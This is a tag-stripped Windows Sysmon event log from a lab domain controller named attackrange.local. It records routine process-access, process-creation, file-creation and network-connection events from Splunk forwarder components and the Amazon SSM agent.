14:05:19.460{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202754Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:19.460{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202753Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:19.460{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202752Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:19.460{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202751Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:19.460{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E91F-6040-324E-00000000AD01}3480C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002202750Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:19.460{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E91F-6040-324E-00000000AD01}3480C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002202749Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:19.460{5ABCFE62-E91F-6040-324E-00000000AD01}3480C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002202761Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:20.523{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=640F8D7DBEDDA4D278A1DA578938F25E,SHA256=43AE194138A98A1E0F3676F581F78A1A9FDA41C357AC490A5530C881A64082D4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202760Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:17.030{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60663-false10.0.1.12-8000- 23542300x80000000000000002202762Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:21.539{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AEA0DFF0471FFC176402A93F8446628,SHA256=054AA917EAD63439AC2B7F7CCF770B99D90ED59FC56ED91370125DEB927F042C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202764Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:22.551{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADA20424686A9E1795CDFE7E322817F0,SHA256=FDDE05C8EFF051E8B10F070C469683D0441145A1864D5F6CAC9448E8B6EA1DE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202763Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:22.223{5ABCFE62-842F-603E-1100-00000000AD01}620NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=FD595E51DCE430F5C4FDDEB7CA3F0C49,SHA256=13ADF46C83E30087D67CF8DCA6DF10577CDE63FC1EBD896CB5773079ED6EDEDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202765Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:23.551{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D681001F2CD6D940F3C602706B0F3474,SHA256=4270E01BFA7C4FB9D00A9DF2784DC34975B36BF3B743A8FC16FD5891A2E20E9E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202766Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:24.554{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=346C8A9578DD75AECA7327D98CF42610,SHA256=B4FE60A280D8607C49E2DCFCC1741D8053E9C0730A13078D560F341E2C2A726F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202767Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:25.554{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF5C7DA39DCBE00F03D138748953B0B9,SHA256=F75847E5DAE1541B7AB7E9F73F722C8D53E9BA5A1BA1BF5F8730FE15FF31DCC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202770Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:26.570{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BFDF90AFD7176C616F3029A9DC38522,SHA256=520AFADE565D02F5D982A76C57EDCBC4D311C91B876562633CC4C89E5D60C7E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202769Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:26.210{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8E67D5093970BD38D1FCF1A204462191,SHA256=1A4E010F4469B1EC0B8A14654FFBD5D99E4EC5E5FFE481DE2CC95617E16E2F67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202768Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:26.210{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=648D8757F550E4D1047D1E9B18868896,SHA256=35657868B8EA4D2771585930ED12469F17F1AB0E6A7126BC3DE582D18CCAAB66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202772Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:27.570{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06D0C2FA4B23F8D484164FC1C99BBB3F,SHA256=2CDF6D4F7E7394647E4DCD709C8EF130D2DBB44CC744A115A4E6097E9A6E1BD0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202771Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:22.875{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60664-false10.0.1.12-8000- 23542300x80000000000000002202773Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:28.585{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B2D5B6082937B86F60012C1F20E4DB5,SHA256=BE3AA26727380A049C5BBF5D51C8714C63C70128CF1263184568BF3183B2B1B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202774Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:29.585{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FD51C301CC866AFEA1E8F1BB827F451,SHA256=8EDE0F8F737919870445BE65378F88625BE3D3DFD8D78E7480A420DF736292EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202776Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:30.788{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8E67D5093970BD38D1FCF1A204462191,SHA256=1A4E010F4469B1EC0B8A14654FFBD5D99E4EC5E5FFE481DE2CC95617E16E2F67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202775Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:30.601{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2F472171975AFE3F02D23EA9B7D5D4A,SHA256=D6C4FBF781D064CB126BF5B848AFB48D3EB4ED0543EFE48C950FFFBAFAA11156,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202778Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:27.968{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60665-false10.0.1.12-8000- 23542300x80000000000000002202777Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:31.610{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E535818E90083BF45470A00AF9FEADF,SHA256=1C27B9E85403E73C0C41447D3357F70262C89DA8EF1C77F1F96D6C85C2211085,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202782Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:28.694{5ABCFE62-8444-603E-5800-00000000AD01}3304C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60667-false169.254.169.254-80http 354300x80000000000000002202781Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:28.693{5ABCFE62-8444-603E-5800-00000000AD01}3304C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60666-false169.254.169.254-80http 23542300x80000000000000002202780Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:32.626{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7F803D5DDBDF05D13E5B63DF6877F13,SHA256=1A97A0289D486C799F57EF511DD9315C4BE03B6506ECD5C792701D940F90CA27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202779Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:32.079{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D91005D3B302BC14C02A9E40181FEB87,SHA256=8BFAD62F7B09ED4E11A3977D0C4FEDDF35E7F077C58644B7BEB25D94267763A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202783Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:33.641{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2168B29F67FB8959992EED96AA236407,SHA256=E8D992BABEDC62428EA48796636ABE5A069E56B1802AE1DD38BDD12FFD57BA63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202784Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:34.641{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C26F944AAF0EC05BE383BE31CA3E791,SHA256=40409DEB773BD46CD17CD665FFA0C17C37A42A39606D2A575E9919AA111A223A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202785Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:35.657{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DEF921A1B53A62AA4ED9FA14C658B53,SHA256=B24FAC086FD1A95EB386A79F44F681938091D1EE99D267FDFC21CB0E99ADA06A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202788Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:36.658{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8D41E304C3B56B3CF37A2149154836E,SHA256=3B458C7776828F776E3022C42C91FDAF1D16ED9BCA8488CA29D5F09AAB83DD46,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202787Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:33.024{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60668-false10.0.1.12-8000- 23542300x80000000000000002202786Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:36.220{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=769733245FC19370AE042C784061062B,SHA256=3F88C8B07F55CA5B86BB7AB3686B3795B52CAE52C77269C53AC28758AF577B69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202789Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:37.658{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E723CA6F74AC9327A7028494F19ECF6,SHA256=3ECFEE4C971C24EA6634FCD5F4FD7694A15CC230439F9ECB3D8AB182D8E467E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202791Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:38.658{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF856B6D9903305D0B7B1301DCA09E9E,SHA256=D2DEDC372EBDDF7536BD11410D61D6BB33607E7996EBED5939B458C497F6E0C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202790Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:38.236{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BEA03D5D337A6BC676E81907284AB08A,SHA256=4B2C2DF8E1CAAA085D91FEABD77072230140A08D9C3427889E7C2C6BE3256C68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202792Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:39.674{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FDAD07C3236C4500EE95C7D9EB9CC0B,SHA256=D5E392F2478E781EBA7909160DD7E3E60BBB5EF05B4DE93919EAB4771EB6458B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202793Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:40.674{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E995ECF7C0BC8CF1BBACC4BDE4B60296,SHA256=E2AC358A29FAF9E0265BD31F05320B9872D8EA471F336159DBFADC072A91D09D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202796Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:38.088{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60670-false10.0.1.12-8000- 23542300x80000000000000002202795Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:41.689{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28D2F839A2BADD71B921B9027F737912,SHA256=CCA7140E13EEF5A49B1A78B61B297A7379C40E15F3AB03840A4DEE5F1004F619,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202794Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:41.486{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=11A8B675198041A1D01F2E7702531372,SHA256=0672232B604B812AACB95A016508B859C8575B40E6E7D08ACA7B064CB5BEE5A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202798Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:42.720{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=81C19E598C9E3CFE30026AC5A81BA3C2,SHA256=E96897CDC4B50AA12178D44D1F43FCDC2B57231C1FD743C315F3A9C9384E8F47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202797Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:42.705{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBF49CCAD8EE9522C54925722571EBC1,SHA256=ADBE9D0E209AC5B48208E337569732CB9D536FE441E78A0210018053A0A0E1D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202799Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:43.720{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 